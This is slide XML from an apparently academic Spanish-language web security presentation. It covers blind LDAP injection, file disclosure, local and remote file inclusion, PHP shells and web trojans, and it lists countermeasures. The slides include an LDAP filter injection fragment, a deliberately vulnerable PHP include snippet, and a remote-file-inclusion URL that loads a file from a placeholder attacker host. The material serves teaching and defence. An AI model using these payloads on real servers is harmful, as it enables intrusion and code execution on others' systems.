              <a:rPr lang="es-ES" b="1" i="1" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0"/>
              <a:t>=*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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Blind LDAP injecttion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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Tiene lógica binaria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Tiene soporte para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>booleanización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Comodín: *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Reducción </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: *a*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Despliegue: a*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Relacionales: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&gt;=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>&lt;=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>~=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=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Booleanización de datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5017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0180" name="Picture 2" descr="D:\Universidad\Blind LDAP Injection\Imagen_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1285875"/>
            <a:ext cx="84201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Excepciones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Certezas absolutas (RFC  4256)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> FALSE (|) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> TRUE (&amp;) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Anomalías:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>¿NOT absoluto? (!) -&gt; equivalente a !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Caracteres fuera del alfabeto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ñ* -&gt; equivalente a *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ç* -&gt; equivalente a *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>** -&gt; equivalente a ¡¡ERROR!!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MITO IV: Es cosa de la gente de Sistemas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Imagen" descr="ve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817" y="5936057"/>
            <a:ext cx="1105054" cy="666843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848255" y="6238141"/>
            <a:ext cx="6984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http://www.verizonbusiness.com/resources/security/databreachreport.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3440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6427" y="1582162"/>
            <a:ext cx="5504234" cy="4155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Blind LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES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Contramedidas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LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/Blind LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Filtrar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Uso de privilegios &amp; Roles LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>MIMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>LDAP-s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>IPSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES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1175" y="4286256"/>
            <a:ext cx="7324163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 bwMode="auto">
          <a:xfrm>
            <a:off x="2660650" y="1506538"/>
            <a:ext cx="6262688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ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="DC0081"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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Vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801938" y="1487488"/>
            <a:ext cx="6021387" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp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6213" y="2771775"/>
            <a:ext cx="6210300" cy="2981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/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (RFD)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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También conocida como  técnica del “cucharon”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Posibilidad de descargarse ficheros “privados” a través de las páginas de descarga proporcionadas por las aplicaciones Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Búsqueda de aplicaciones vulnerables con cadenas tipo “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>download.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Implica errores tanto en el desarrollo de la aplicación como en la configuración del Servidor Web y el sistema de permisos  de acceso a disco (NTFS/Ext3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-E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Local and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (LFI &amp; RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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Vulnerabilidad propia de páginas PHP dinámicas que permite enlace de archivos  locales </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>oremotos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> situados en otros servidores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se debe a una mala programación o uso de la función </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Esta vulnerabilidad no se da en páginas programadas en un lenguaje permita la inclusión de ficheros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Local and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (LFI &amp; RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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La vulnerabilidad es producida por código semejante a este</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En páginas de este tipo se puede incluir ficheros que estén en nuestro servidor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty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2867025" y="2163763"/>
            <a:ext cx="2735263" cy="801687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sz="1400">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$page = $_GET['page'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>include($page);	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Garamond" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:latin typeface="Garamond" pitchFamily="18" charset="0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223963" y="4289425"/>
            <a:ext cx="7143750" cy="52546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sz="1400">
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://victima.com/pagvuln.php?page=http://[misitio]/miFichero	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Garamond" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="140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Local and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (LFI &amp; RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Existen herramientas que permite explorar un sitio Web en busca de este tipo de vulnerabilidades (rpvs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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808038" y="2501900"/>
          <a:ext cx="7848600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4" imgW="8177778" imgH="1930159" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId4" imgW="8177778" imgH="1930159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2501900"/>
                        <a:ext cx="7848600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Local and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (LFI &amp; RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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Mediante las shell PHP se pueden ejecutar comandos en una página Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Usando RFI se puede incluir un fichero que ejecute comandos, tales como listar directorios, obtener y colocar ficheros, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>“El inconveniente” es que la mayoría de servidores Web en PHP tienen deshabilitadas las funciones exec, system o passthru que impiden la ejecución de comandos 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Local and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (LFI &amp; RFI)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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Sin embargo, existen funciones como show_source(‘archivo’) que permiten la visualización del código fuente de una página</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>A su vez, existen otra serie de funciones que nos permiten listar el contenido de un directorio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>El uso de estas funciones no puede ser limitado y no depende del SO sobre el que se encuentra instalado el Servidor Web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Local and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (LFI &amp; RFI)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Fundamentos para una Aplicación Web Segura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Securizar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> la red, el servidor y la aplicación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4" name="3 Imagen" descr="chiste econom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2707" y="3093395"/>
            <a:ext cx="5529768" cy="3492485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429730" y="1919964"/>
            <a:ext cx="6954837" cy="129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33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buChar char="►"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="es-ES" sz="1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“Una vulnerabilidad en la red pude permitir a un usuario explotar un Servidor o una aplicación. Una vulnerabilidad en un Servidor puede permitir a un usuario explotar una red o una aplicación. Una vulnerabilidad en una aplicación puede permitir a un usuario explotar una red o un servidor”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="r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33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="es-ES" sz="1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Carlos Lyons, Corporate Security, Microsoft</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-ES" sz="14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Troyanos Web. Explotación del Ataque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800" dirty="0"/>
              <a:t>Servidores Web no fortificados</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejecución de programas en almacenes de ficheros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Subida de ficheros a servidores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Imágenes para publicaciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Archivos de informes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Currículos, cuentos, etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Almacenes de ficheros accesibles en remoto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-E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Troyanos Web. Riesgos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Implantación de un troyano que puede:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Gestionar ficheros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejecutar programas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Destrozar el sistema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Defacement</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Robo de información</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-E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Troyanos Web. Forma de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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1001713" y="1487488"/>
            <a:ext cx="7239000" cy="4665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sz="2800"/>
              <a:t>Programación de un troyano en PHP, ASP o JSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800"/>
              <a:t>Utilización de objetos FileObject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800"/>
              <a:t>Subida mediante ASP Upload, FTP o RFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800"/>
              <a:t>Búsqueda del lugar de almacenamiento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2800"/>
              <a:t>Invocación por URL pública del servidor Web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Troyano Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 bwMode="auto">
          <a:xfrm>
            <a:off x="2660650" y="1506538"/>
            <a:ext cx="6262688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ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="DC0081"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Direct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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Vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801938" y="1487488"/>
            <a:ext cx="6021387" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
